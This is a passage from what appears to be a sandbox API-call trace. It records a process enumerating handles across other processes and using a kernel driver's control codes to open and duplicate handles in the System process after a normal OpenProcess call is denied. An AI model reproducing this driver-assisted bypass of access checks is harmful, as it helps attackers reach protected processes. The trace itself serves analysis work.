hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0198.118] CloseHandle (hObject=0xc8) returned 1 [0198.119] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x88) returned 0x360b50 [0198.119] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x360b50, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x360b50*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0198.119] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b35a8 | out: Process=0xfffff880052b35a8) returned 0x0 [0198.119] PsAcquireProcessExitSynchronization () returned 0x0 [0198.119] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35c8 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35c8) [0198.119] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b35b0, HandleInformation=0x0 | out: Object=0xfffff880052b35b0*=0xfffffa80039b2ef0, HandleInformation=0x0) returned 0x0 [0198.119] PsReleaseProcessExitSynchronization () returned 0x2 [0198.119] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0198.119] ZwQueryObject (in: Handle=0x370, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff880052b35a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff880052b35a4) returned 0xc0000004 [0198.119] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xfffff8a002567ab0 [0198.119] ZwQueryObject (in: Handle=0x370, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a002567ab0, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a002567ab0, ReturnLength=0x0) returned 0x0 [0198.119] ExFreePoolWithTag (P=0xfffff8a002567ab0, Tag=0x0) [0198.119] ObfDereferenceObject (Object=0xfffffa80039b2ef0) returned 0x2 [0198.119] KeUnstackDetachProcess (ApcState=0xfffff880052b35c8) [0198.119] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.120] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x360b50 | out: hHeap=0x320000) returned 1 [0198.120] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.120] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.120] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.120] PsAcquireProcessExitSynchronization () returned 0x0 [0198.120] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0198.120] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039b2ef0, HandleInformation=0x0) returned 0x0 [0198.120] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.120] PsReleaseProcessExitSynchronization () returned 0x2 [0198.120] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0198.120] ObQueryNameString (in: Object=0xfffffa80039b2ef0, ObjectNameInfo=0xfffffa800314e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.120] ObfDereferenceObject (Object=0xfffffa80039b2ef0) returned 0x2 [0198.120] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.121] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.121] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc8 [0198.121] GetCurrentProcess () returned 0xffffffffffffffff [0198.121] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0198.121] CloseHandle (hObject=0xc8) returned 1 [0198.121] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x88) returned 0x360b50 [0198.121] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x360b50, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x360b50*, lpBytesReturned=0x12d450*=0x1c, lpOverlapped=0x0) returned 1 [0198.121] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b35a8 | out: Process=0xfffff880052b35a8) returned 0x0 [0198.121] PsAcquireProcessExitSynchronization () returned 0x0 [0198.121] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35c8 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35c8) [0198.122] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b35b0, HandleInformation=0x0 | out: Object=0xfffff880052b35b0*=0xfffff8a001057e80, HandleInformation=0x0) returned 0x0 [0198.122] PsReleaseProcessExitSynchronization () returned 0x2 [0198.122] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0198.122] ZwQueryObject (in: Handle=0x150, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff880052b35a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff880052b35a4) returned 0xc0000004 [0198.122] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xfffff8a002567ab0 [0198.122] ZwQueryObject (in: Handle=0x150, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a002567ab0, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a002567ab0, ReturnLength=0x0) returned 0x0 [0198.122] ExFreePoolWithTag (P=0xfffff8a002567ab0, Tag=0x0) [0198.122] ObfDereferenceObject (Object=0xfffff8a001057e80) returned 0x2 [0198.122] KeUnstackDetachProcess (ApcState=0xfffff880052b35c8) [0198.122] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.122] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x360b50 | out: hHeap=0x320000) returned 1 [0198.122] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.123] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.123] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.123] PsAcquireProcessExitSynchronization () returned 0x0 [0198.123] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0198.123] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001057e80, HandleInformation=0x0) returned 0x0 [0198.123] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.123] PsReleaseProcessExitSynchronization () returned 0x2 [0198.123] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0198.123] ObQueryNameString (in: Object=0xfffff8a001057e80, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.123] ObfDereferenceObject (Object=0xfffff8a001057e80) returned 0x2 [0198.123] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.124] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.124] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x370) returned 0xc8 [0198.124] GetCurrentProcess () returned 0xffffffffffffffff [0198.124] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x9b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0198.124] CloseHandle (hObject=0xc8) returned 1 [0198.124] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.124] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x70) returned 0x344c50 [0198.124] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.124] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.124] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.124] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0198.125] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.125] PsAcquireProcessExitSynchronization () returned 0x0 [0198.125] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880052b35d0) [0198.125] ObReferenceObjectByHandle (in: Handle=0x9b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037acce0, HandleInformation=0x0) returned 0x0 [0198.125] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.125] PsReleaseProcessExitSynchronization () returned 0x2 [0198.125] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d4 [0198.125] ObQueryNameString (in: Object=0xfffffa80037acce0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.125] ObfDereferenceObject (Object=0xfffffa80037acce0) returned 0x4 [0198.125] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.125] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.125] CloseHandle (hObject=0xc4) returned 1 [0198.125] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x338) returned 0xc4 [0198.126] GetCurrentProcess () returned 0xffffffffffffffff [0198.126] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x320, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0198.126] CloseHandle (hObject=0xc4) returned 1 [0198.126] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.126] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x90) returned 0x344820 [0198.126] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x344820, ObjectInformationLength=0x90, ReturnLength=0x0 | out: ObjectInformation=0x344820, ReturnLength=0x0) returned 0x0 [0198.126] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344820 | out: hHeap=0x320000) returned 1 [0198.126] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.126] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.126] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.126] PsAcquireProcessExitSynchronization () returned 0x0 [0198.126] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0198.126] ObReferenceObjectByHandle (in: Handle=0x320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003674a60, HandleInformation=0x0) returned 0x0 [0198.127] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.127] PsReleaseProcessExitSynchronization () returned 0x2 [0198.127] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0198.127] ObQueryNameString (in: Object=0xfffffa8003674a60, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.127] ObfDereferenceObject (Object=0xfffffa8003674a60) returned 0x2 [0198.127] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.127] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.127] CloseHandle (hObject=0xc8) returned 1 [0198.127] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x1e8) returned 0xc8 [0198.127] GetCurrentProcess () returned 0xffffffffffffffff [0198.127] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x170, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0198.127] CloseHandle (hObject=0xc8) returned 1 [0198.128] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.128] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0198.128] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.128] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.128] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.128] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0198.128] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.128] PsAcquireProcessExitSynchronization () returned 0x0 [0198.128] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880052b35d0) [0198.128] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80018b5f40, HandleInformation=0x0) returned 0x0 [0198.128] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.128] PsReleaseProcessExitSynchronization () returned 0x2 [0198.128] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x40 [0198.128] ObQueryNameString (in: Object=0xfffffa80018b5f40, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.129] ObfDereferenceObject (Object=0xfffffa80018b5f40) returned 0xc [0198.129] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.129] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.129] CloseHandle (hObject=0xc4) returned 1 [0198.129] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x184) returned 0xc4 [0198.129] GetCurrentProcess () returned 0xffffffffffffffff [0198.129] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x38, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0198.129] CloseHandle (hObject=0xc4) returned 1 [0198.129] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.129] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x88) returned 0x360b50 [0198.129] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x360b50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x360b50, ReturnLength=0x0) returned 0x0 [0198.129] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x360b50 | out: hHeap=0x320000) returned 1 [0198.129] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.130] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0198.130] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.130] PsAcquireProcessExitSynchronization () returned 0x0 [0198.130] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0198.130] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a004498db0, HandleInformation=0x0) returned 0x0 [0198.130] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.130] PsReleaseProcessExitSynchronization () returned 0x2 [0198.130] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x180 [0198.130] ObQueryNameString (in: Object=0xfffff8a004498db0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.130] ObfDereferenceObject (Object=0xfffff8a004498db0) returned 0x3 [0198.130] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.130] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.130] CloseHandle (hObject=0xc8) returned 1 [0198.130] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0198.131] GetLastError () returned 0x5 [0198.131] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335003c, lpInBuffer=0x12d400*, nInBufferSize=0x8, lpOutBuffer=0x12d408, nOutBufferSize=0x8, lpBytesReturned=0x12d390, lpOverlapped=0x0 | out: lpInBuffer=0x12d400*, lpOutBuffer=0x12d408*, lpBytesReturned=0x12d390*=0x8, lpOverlapped=0x0) returned 1 [0198.131] ZwOpenProcess (in: ProcessHandle=0xfffffa8001ebc1c0, DesiredAccess=0x10000000, ObjectAttributes=0xfffff880052b3688*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff880052b3678*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffffa8001ebc1c0*=0xc8) returned 0x0 [0198.131] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.131] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350014, lpInBuffer=0x12d430*, nInBufferSize=0x20, lpOutBuffer=0x12d470, nOutBufferSize=0x8, lpBytesReturned=0x12d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x12d430*, lpOutBuffer=0x12d470*, lpBytesReturned=0x12d3d0*=0x8, lpOverlapped=0x0) returned 1 [0198.131] ZwOpenProcess (in: ProcessHandle=0xfffff880052b35f0, DesiredAccess=0x40, ObjectAttributes=0xfffff880052b3608*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff880052b35f8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffff880052b35f0*=0xffffffff800007dc) returned 0x0 [0198.131] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff800007dc, SourceHandle=0x42c, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xfffffa8001ebc1c0, DesiredAccess=0xfffff88010000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xfffffa8001ebc1c0*=0xc4) returned 0x0 [0198.131] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0198.131] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.131] CloseHandle (hObject=0xc8) returned 1 [0198.131] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.131] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0198.131] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.132] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.132] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.132] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.132] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.132] PsAcquireProcessExitSynchronization () returned 0x0 [0198.132] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.132] ObReferenceObjectByHandle (in: Handle=0xffffffff8000042c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039086d0, HandleInformation=0x0) returned 0x0 [0198.132] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.132] PsReleaseProcessExitSynchronization () returned 0x2 [0198.132] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.132] ObQueryNameString (in: Object=0xfffffa80039086d0, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.132] ObfDereferenceObject (Object=0xfffffa80039086d0) returned 0x5 [0198.132] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.132] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.132] CloseHandle (hObject=0xc4) returned 1 [0198.132] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0198.133] GetLastError () returned 0x5 [0198.133] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335003c, lpInBuffer=0x12d400*, nInBufferSize=0x8, lpOutBuffer=0x12d408, nOutBufferSize=0x8, lpBytesReturned=0x12d390, lpOverlapped=0x0 | out: lpInBuffer=0x12d400*, lpOutBuffer=0x12d408*, lpBytesReturned=0x12d390*=0x8, lpOverlapped=0x0) returned 1 [0198.133] ZwOpenProcess (in: ProcessHandle=0xfffffa8001ebc1c0, DesiredAccess=0x10000000, ObjectAttributes=0xfffff880052b3688*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff880052b3678*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffffa8001ebc1c0*=0xc4) returned 0x0 [0198.133] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.133] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350014, lpInBuffer=0x12d430*, nInBufferSize=0x20, lpOutBuffer=0x12d470, nOutBufferSize=0x8, lpBytesReturned=0x12d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x12d430*, lpOutBuffer=0x12d470*, lpBytesReturned=0x12d3d0*=0x8, lpOverlapped=0x0) returned 1 [0198.133] ZwOpenProcess (in: ProcessHandle=0xfffff880052b35f0, DesiredAccess=0x40, ObjectAttributes=0xfffff880052b3608*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff880052b35f8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffff880052b35f0*=0xffffffff800007dc) returned 0x0 [0198.133] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff800007dc, SourceHandle=0x428, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xfffffa8001ebc1c0, DesiredAccess=0xfffff88010000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xfffffa8001ebc1c0*=0xc8) returned 0x0 [0198.133] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0198.133] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.133] CloseHandle 